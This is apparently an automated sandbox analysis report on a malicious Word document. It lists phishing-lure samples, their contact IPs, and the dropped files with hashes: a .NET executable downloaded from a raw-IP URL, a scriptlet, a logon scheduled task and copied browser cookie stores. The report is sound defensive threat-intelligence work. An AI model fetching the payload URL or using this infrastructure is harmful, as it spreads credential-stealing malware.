 | DOCUMENTS.exe | malicious | 208.91.199.223
 | Activation Online Mail.htm | malicious | 103.50.163.110
 | Purchase Order PO#7701.exe | malicious | 208.91.198.143
 | STATEMENT OF ACCOUNT.xlsx | malicious | 208.91.199.225
 | XsFFv27rls.exe | malicious | 208.91.199.225
 | TNT E-Invoice No 11073490.exe | malicious | 208.91.199.225
 | SWIFT COPY.exe | malicious | 199.79.62.99
 | E invoice.exe | malicious | 208.91.199.225
 | TOP QUOTATION RFQ 2021.exe | malicious | 208.91.199.224
 | TOwYernH3DhfPER.exe | malicious | 208.91.199.181
 | Activation Online Mail.htm | malicious | 103.50.163.110
 | Bill of lading.exe | malicious | 208.91.199.225
 | UY2021 Ta-Ho Maritime Schedule.exe | malicious | 208.91.199.223
                                                                                                              STATEMENT OF ACCOUNT.xlsxGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              XsFFv27rls.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              TNT E-Invoice No 11073490.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              SWIFT COPY.exeGet hashmaliciousBrowse
                                                                                                              • 199.79.62.99
                                                                                                              E invoice.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              TOP QUOTATION RFQ 2021.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.224
                                                                                                              TOwYernH3DhfPER.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.181
                                                                                                              Activation Online Mail.htmGet hashmaliciousBrowse
                                                                                                              • 103.50.163.110
                                                                                                              Bill of lading.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              UY2021 Ta-Ho Maritime Schedule.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.223

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\taskmg[1].exe
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Category:downloaded
                                                                                                              Size (bytes):777216
                                                                                                              Entropy (8bit):7.787171245644076
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:rBzcmhiTcQfDYWTRCFySBx5CC6Z0KbS7gdqszdlLhrpGreLM8vZw+JS1nHLE2D2W:rBomhiQYYWEFyw5USIHLu4vG7Hc95i11
                                                                                                              MD5:815982590DE5E574ABB8A0310826E200
                                                                                                              SHA1:6C41343A2E25F932F901E53E615CC083209F6A65
                                                                                                              SHA-256:56960095EA2EDA1C680F9DF0937A792E9BCA7AF4922931540688097E6D2A43BB
                                                                                                              SHA-512:4C343183EC50C6887B758ED1FA40478BC87A0944792944D42C9978EBDA94B08A9D2E3E77B039963BF0A3EC2D5090BBB7FBA9CF0486EBE8C00AC393A2361FCE98
                                                                                                              Malicious:true
                                                                                                              Reputation:low
                                                                                                              IE Cache URL:http://173.232.204.89/taskmg.exe
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..a..............0.................. ........@.. .......................@............@.................................\...O............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H........H...!..........Lj................................................s....}.....s ...}.....(!....(.....{.....o"...*.0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(*...-...........o.....*..................{....o+....{....o,...o-.....}....*.0..)........{.........(....t......|......(...+...3.*....0..)........{.........(0...t......|......(...+...3.*....0..........
                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3263CED7.png
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                              File Type:370 sysV pure executable
                                                                                                              Category:dropped
                                                                                                              Size (bytes):262160
                                                                                                              Entropy (8bit):0.0018490830516166626
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:j//VqllXWkjd0d8lltFIlfylvxtlPLl:j//g8od0mlXuu
                                                                                                              MD5:768311D8560A7B68F932635AFBB0BE29
                                                                                                              SHA1:2682A89B637FA735C3AEA5775BCEAC01DFA279D6
                                                                                                              SHA-256:B85834248C00C5651F339C9C062EEAF649859E815E1A6E4116E2B80F025DAE44
                                                                                                              SHA-512:A6843C4612C60D4D0FC3BA6E7C3104C64A725E14ABC8AD41C6A4875A2AEE8C3A1091B6B60BF7FC2199A6368733AFEF92C713EA710171441AC29731E61432E3EF
                                                                                                              Malicious:false
                                                                                                              Reputation:low
                                                                                                              Preview: X.C......{^.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\867A2AEC.wmf
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                              File Type:Targa image data - Map - RLE 1569 x 65536 x 0 +2 "\005"
                                                                                                              Category:dropped
                                                                                                              Size (bytes):3712
                                                                                                              Entropy (8bit):5.038125428163887
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:wk7Hgwj+mbYf3LSrhlOs0f5aSdHn63Dx3:wk7Awam8fI4s0f5ap3
                                                                                                              MD5:A471EB10EDF79F5E92490204E5B3C016
                                                                                                              SHA1:094EB944A7BE50A54FF8E215207A5B2D24D7408E
                                                                                                              SHA-256:96065A620C5F15B1A8BC2291D5D241832AAFB187475AD45576C10BAA689619FD
                                                                                                              SHA-512:0B432B8D56C81B9F52A92C2977AE34DE5EFA1B73D01B10DB9B72701D7D16BCB9ABE05760A095253A3FA4DA7A57E588C88C7CC15700308BFF9CFFBEE2A11CAA15
                                                                                                              Malicious:false
                                                                                                              Preview: ......@.....!.....................5...........................Segoe UI....C.-.....@..........s....-...........................A..... . ..... . ...:.(... ...@.............................................................................................................................................................................................................................................................................................?.........!...A.F.f. . ..... . ...:.(... ... ................................................................................................................................................................................................................................................................................................................................G .>..:..9..8..8..8..9..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:.i2........K..S(.O$.N!.N!.N!.N!.N".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".N".M".M".O$.S).O".......l
                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2A2CF84F-B5BA-43C4-A797-10CB765CC9B0}.tmp
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                              Category:dropped
                                                                                                              Size (bytes):214016
                                                                                                              Entropy (8bit):4.757365759711338
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:5Eabzacasapa2H/Na7yTAEabzacasapa2H/Na7pKv:Xbzacasapa2HY7hbzacasapa2HY7
                                                                                                              MD5:EC345C74FAF6F653C35C60E305D8914E
                                                                                                              SHA1:466F1FF61AD7D611B31932A4D861330B88535B9C
                                                                                                              SHA-256:7B6862C9A303B229AEC0C3D8F45F7291447F4FDD0ADE59513E8E8278B2BB87F6
                                                                                                              SHA-512:A563D3AA6EEDFD3B4BED6C372C0B4A4055D71F75D2A5B54CA796AF2CFE6E65744939C0539D43F0ECE6600A570ADE3F4E44710E1DF3EF6CAD437E76B121EB759D
                                                                                                              Malicious:false
                                                                                                              Preview: ......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4DFB1A07-CB4F-472F-B236-A3BF6A79B957}.tmp
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):44098
                                                                                                              Entropy (8bit):2.8795771285294594
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:768:dT/3ViFs0Dqeb4Zep84JtueJvCI19rIwzWSgUg4P58F:5Fia0Dqeb0nstw29rVzWSgm58F
                                                                                                              MD5:0639D028278A2669A3D479D75A5ED861
                                                                                                              SHA1:437C61B35B9C7FFBD4C4B41B0BBAE84E228FA1F9
                                                                                                              SHA-256:360C3B6069F9DFE479ADFEF7893BFA0AEDB86A4239E117DFAA33EA4919EC17CB
                                                                                                              SHA-512:C03E435B6FD4B9348642FA05985199C60E0684CFB5FB2BA71928F414E12BEA15A5AF88FD70C3B9052D2F6E0E3E97FE381E0A9DA4E144C3C4424410F3AA2A524B
                                                                                                              Malicious:false
                                                                                                              Preview: c.0.5.=......... .P.a.c.k.a.g.e.E.M.B.E.D.W.o.r.d...D.o.c.u.m.e.n.t...8.........=....... .\.a. .W.o.r.d...D.o.c.u.m.e.n.t...8. .".%.T.M.P.%.\.\.a.b.d.t.f.h.g.h.g.e.g.h.D.p.~...S.C.T.". .".e.w.:.{.0.0.0.0.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.0.0.0.0.0.0.0.0.}.".L.I.N.K.........................................................................................................................................................................................................................................................H...R...X............................................................................................................................................................................................................................................................................................................................................................................................CJ..OJ..QJ..^J..aJ.....j....CJ..OJ..QJ..U..^J..aJ.. .j.PJe...CJ..OJ..QJ..U..^J..aJ.
                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6B5678D1-0902-45B5-A7D8-811025AE74F7}.tmp
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1024
                                                                                                              Entropy (8bit):0.05390218305374581
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:ol3lYdn:4Wn
                                                                                                              MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                              SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                              SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                              SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                              Malicious:false
                                                                                                              Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C8C94021-4E02-4955-8AF8-3AD414138F04}.tmp
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1536
                                                                                                              Entropy (8bit):1.3554734412254814
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbG:IiiiiiiiiifdLloZQc8++lsJe1MzLl/
                                                                                                              MD5:64E043ACB99A5A7A6BEDF8B83BEA3CF6
                                                                                                              SHA1:BD260E7730F22912CEB711384253D9820AF96EB4
                                                                                                              SHA-256:47E5EE0092D08DEF032FD11BF38DD8EE9827BC1809BA6722C439A24EA6634FE7
                                                                                                              SHA-512:626F3FCD72C8AE3DF333D56EFD4CB631ED849F395ED5771CB8DA4F67938D94693EF798E33857700B8CE7EDBAF6C9C74CC05BD20ACADC06D5E2B4F4571E6131C2
                                                                                                              Malicious:false
                                                                                                              Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):97522
                                                                                                              Entropy (8bit):4.490013837211777
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:768:VEabzacasapa2lGWOlARldNVYwUn7ZwPW1ir:VEabzacasapa2H/Na7M
                                                                                                              MD5:330B9EB7A9C4CA0E21376FC14CCD2CAD
                                                                                                              SHA1:B42ADF2B6AAAE3AD3BC2CC02E4CACD7A1F47F520
                                                                                                              SHA-256:002B90B761DC216BCA8DB9DCED5F3E6802C9BB672CDFA9045FBECC40C5C128F8
                                                                                                              SHA-512:6208CE1A1B4129BEBCE827463B223DAFF88650C26E989E84A7B34E562CB54571AE204BF6A991C5DFA7B6F65EEF77CB83478885B1B793CBA2A337DE17CAA10CD2
                                                                                                              Malicious:true
                                                                                                              Preview: .............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT:Zone.Identifier
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
SSDEEP: 3:gAWY3n:qY3n
MD5: FBCCF14D504B7B2DBCB5A5BDA75BD93B
SHA1: D59FC84CDD5217C6CF74785703655F78DA6B582B
SHA-256: EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
SHA-512: AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
Malicious: false
Preview: [ZoneTransfer]..ZoneId=3..

C:\Users\user\AppData\Local\Temp\tmp3054.tmp
Process: C:\Users\user\AppData\Roaming\taskmg.exe
File Type: XML 1.0 document, ASCII text
Category: dropped
Size (bytes): 1575
Entropy (8bit): 5.117905043975538
Encrypted: false
SSDEEP: 24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtWxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTav
MD5: F5A0FC758800632A9CADD5E7E0FC7FA1
SHA1: 5E6F0BD54FDA0A2CE2929E290E6ADC4163BCE9B1
SHA-256: 4E940EAC9417D347B22F9D86C362B6C00EC2B7D2A69D628A71E899099F00A185
SHA-512: 0282523CEC0CFA09A687DC24C1D494EE889E072BDD16D3AE17DB9F66D1EAC174C1A38F616A4D190DD6129DEC18695C807A3FD11AE0DD4D16F43A501685662E98
Malicious: true
Preview: <?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Roaming\2wi3pnqf.bid\Chrome\Default\Cookies
Process: C:\Users\user\AppData\Roaming\taskmg.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 28672
Entropy (8bit): 0.9650411582864293
Encrypted: false
SSDEEP: 48:T2loMLOpEO5J/KdGU1jX983Gul4kEBrvK5GYWgqRSESXh:inNww9t9wGAE
MD5: 903C35B27A5774A639A90D5332EEF8E0
SHA1: 5A8CE0B6C13D1AF00837AA6CA1AA39000D4EB7CF
SHA-256: 1159B5AE357F89C56FA23C14378FF728251E6BDE6EEA979F528DB11C4030BE74
SHA-512: 076BD35B0D59FFA7A52588332A862814DDF049EE59E27542A2DA10E7A5340758B8C8ED2DEFE78C5B5A89EE54C19A89D49D2B86B49BF5542D76C1D4A378B40277
Malicious: false

C:\Users\user\AppData\Roaming\2wi3pnqf.bid\Firefox\Profiles\7xwghk55.default\cookies.sqlite
Process: C:\Users\user\AppData\Roaming\taskmg.exe
File Type: SQLite 3.x database, user version 7, last written using SQLite version 3017000
Category: dropped
Size (bytes): 524288
Entropy (8bit): 0.08107860342777487
Encrypted: false
SSDEEP: 48:DO8rmWT8cl+fpNDId7r+gUEl1B6nB6UnUqc8AqwIhY5wXwwAVshT:DOUm7ii+7Ue1AQ98VVY
MD5: 1138F6578C48F43C5597EE203AFF5B27
SHA1: 9B55D0A511E7348E507D818B93F1C99986D33E7B
SHA-256: EEEDF71E8E9A3A048022978336CA89A30E014AE481E73EF5011071462343FFBF
SHA-512: 6D6D7ECF025650D3E2358F5E2D17D1EC8D6231C7739B60A74B1D8E19D1B1966F5D88CC605463C3E26102D006E84D853E390FFED713971DC1D79EB1AB6E56585E
Malicious: false

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Reconfirm The Details.LNK
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:56 2021, mtime=Mon Aug 30 20:08:56 2021, atime=Fri Nov 26 01:14:15 2021, length=393215, window=hide
Category: dropped
Size (bytes): 1069
Entropy (8bit): 4.580975445314464
Encrypted: false
SSDEEP: 24:8JuGb/XTTcLImuzUHheiclUvDv3qGniR7m:8JuI/XTAXu4HhaO+GiFm
MD5: 3FCECFD0FE72594F4F6E0F65A3EE4E5D
SHA1: 8660FB634C3AB41C385C9581CBD1D4057A18EA54
SHA-256: 57DEDF327857FC59B8D5BCB93CE2F0B55DD288B53B89206393AB75823A00CE2A
SHA-512: 755CE5A3F7DC93AEE0643B7E050FA839428BAD3DA63714512DC86D20338DB3E1DFD5A729248234B01BE6150D2F6F8F03336491C6CA0798B7283DF39124839C01
Malicious: false

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 93
Entropy (8bit): 4.737415332721156
Encrypted: false
SSDEEP: 3:bDuMJlv2LQhk+UmX1zQQhk+Uv:bCk28hBLhY
MD5: 888B27FA8FB2022F87573241083A8C5B
SHA1: 419994E988722595417CDACA849241DFB646366F
SHA-256: AE627F224CBF7D5A1B449A108B41AFDA558623C92E4A001A16059761D2000232
SHA-512: 54D6A0A3BBEDCB8D901CC66348FFA102F7F7403C07CFF24D77D9F7F8EF03D56AEC41B33B1B5B108C47650B7C0F1EDBB9563E3B97114999C260A020AE0E06F81E
Malicious: false
Preview: [folders]..Templates.LNK=0..Reconfirm The Details.LNK=0..[doc]..Reconfirm The Details.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 162
Entropy (8bit): 2.5038355507075254
Encrypted: false
SSDEEP: 3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
MD5: 45B1E2B14BE6C1EFC217DCE28709F72D
SHA1: 64E3E91D6557D176776A498CF0776BE3679F13C3
SHA-256: 508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
SHA-512: 2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
Malicious: false

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: Little-endian UTF-16 Unicode text, with no line terminators
Category: dropped
Size (bytes): 2
Entropy (8bit): 1.0
Encrypted: false
SSDEEP: 3:Qn:Qn
MD5: F3B25701FE362EC84616A93A45CE9998
SHA1: D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256: B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512: 98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious: false
Preview: ..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 8016
Entropy (8bit): 3.5801138363759324
Encrypted: false
SSDEEP: 96:chQCQMqGqvsqvJCwo0iz8hQCQMqGqvsEHyqvJCwormizKAYDHxiKXX3lUVCiA2:cW7o0iz8WvHnormizKZiKXXriA2
MD5: AAE46096174D979460091E4A6CF9B600
SHA1: 09FE7E96EFA17FCF1A9244BE0643E45C96C766F3
SHA-256: EE253621EEE10EABCFD8BD0560CE745872924071DAE5FCBABC17D4F00CF25704
SHA-512: 433429676CFE542084E780BFE3BBAF83784EEEFB0900965D3C950720590213B67F2D5FC54774AB978F95A6C29099D6D445949E9D47E4D78CB859EEDB238FE125
Malicious: false

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms. (copy)
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 8016
Entropy (8bit): 3.5801138363759324
Encrypted: false
SSDEEP: 96:chQCQMqGqvsqvJCwo0iz8hQCQMqGqvsEHyqvJCwormizKAYDHxiKXX3lUVCiA2:cW7o0iz8WvHnormizKZiKXXriA2
MD5: AAE46096174D979460091E4A6CF9B600
SHA1: 09FE7E96EFA17FCF1A9244BE0643E45C96C766F3
SHA-256: EE253621EEE10EABCFD8BD0560CE745872924071DAE5FCBABC17D4F00CF25704
SHA-512: 433429676CFE542084E780BFE3BBAF83784EEEFB0900965D3C950720590213B67F2D5FC54774AB978F95A6C29099D6D445949E9D47E4D78CB859EEDB238FE125
Malicious: false

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QOH1SFJ01YDJGSRFKM6L.temp
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 8016
Entropy (8bit): 3.5801138363759324
Encrypted: false
SSDEEP: 96:chQCQMqGqvsqvJCwo0iz8hQCQMqGqvsEHyqvJCwormizKAYDHxiKXX3lUVCiA2:cW7o0iz8WvHnormizKZiKXXriA2
MD5: AAE46096174D979460091E4A6CF9B600
SHA1: 09FE7E96EFA17FCF1A9244BE0643E45C96C766F3
SHA-256: EE253621EEE10EABCFD8BD0560CE745872924071DAE5FCBABC17D4F00CF25704
SHA-512: 433429676CFE542084E780BFE3BBAF83784EEEFB0900965D3C950720590213B67F2D5FC54774AB978F95A6C29099D6D445949E9D47E4D78CB859EEDB238FE125
Malicious: false

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SSOY99TCA63S5VSW1UNJ.temp
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 8016
Entropy (8bit): 3.5801138363759324
Encrypted: false
SSDEEP: 96:chQCQMqGqvsqvJCwo0iz8hQCQMqGqvsEHyqvJCwormizKAYDHxiKXX3lUVCiA2:cW7o0iz8WvHnormizKZiKXXriA2
MD5: AAE46096174D979460091E4A6CF9B600
SHA1: 09FE7E96EFA17FCF1A9244BE0643E45C96C766F3
SHA-256: EE253621EEE10EABCFD8BD0560CE745872924071DAE5FCBABC17D4F00CF25704
SHA-512: 433429676CFE542084E780BFE3BBAF83784EEEFB0900965D3C950720590213B67F2D5FC54774AB978F95A6C29099D6D445949E9D47E4D78CB859EEDB238FE125
Malicious: false
                                                                                                              Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SX36BOTN39J9C9J03BTG.temp
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8016
                                                                                                              Entropy (8bit):3.5818435904178987
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:chQCQMqGqvsqvJCwo0iz8hQCQMqGqvsEHyqvJCwormiztAKrVHxipxpyX3lUVCih:cW7o0iz8WvHnormizt5Pif8XriA2
                                                                                                              MD5:77F3843A1E78AA18EC48DEDA062DAA8C
                                                                                                              SHA1:23318033CE15969125FD192C56E3BE5955F77C74
                                                                                                              SHA-256:DEAFC5ECB755BBE38997255704446A06CDBB6B0BC77EA28C55C9EE8167171482
                                                                                                              SHA-512:E12E25FE49643FAD7D8EB33840D756DBA07B87A7288E2834C774CD3E54B256D5BD2DC2A8F86DEAEFBDAFFF7FF8CBEF7D41623877400279BEEC4A706F95149290
                                                                                                              Malicious:false
                                                                                                              Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\U7TXBSPCBZC5YKNEVYY5.temp
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8016
                                                                                                              Entropy (8bit):3.5801138363759324
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:chQCQMqGqvsqvJCwo0iz8hQCQMqGqvsEHyqvJCwormizKAYDHxiKXX3lUVCiA2:cW7o0iz8WvHnormizKZiKXXriA2
                                                                                                              MD5:AAE46096174D979460091E4A6CF9B600
                                                                                                              SHA1:09FE7E96EFA17FCF1A9244BE0643E45C96C766F3
                                                                                                              SHA-256:EE253621EEE10EABCFD8BD0560CE745872924071DAE5FCBABC17D4F00CF25704
                                                                                                              SHA-512:433429676CFE542084E780BFE3BBAF83784EEEFB0900965D3C950720590213B67F2D5FC54774AB978F95A6C29099D6D445949E9D47E4D78CB859EEDB238FE125
                                                                                                              Malicious:false
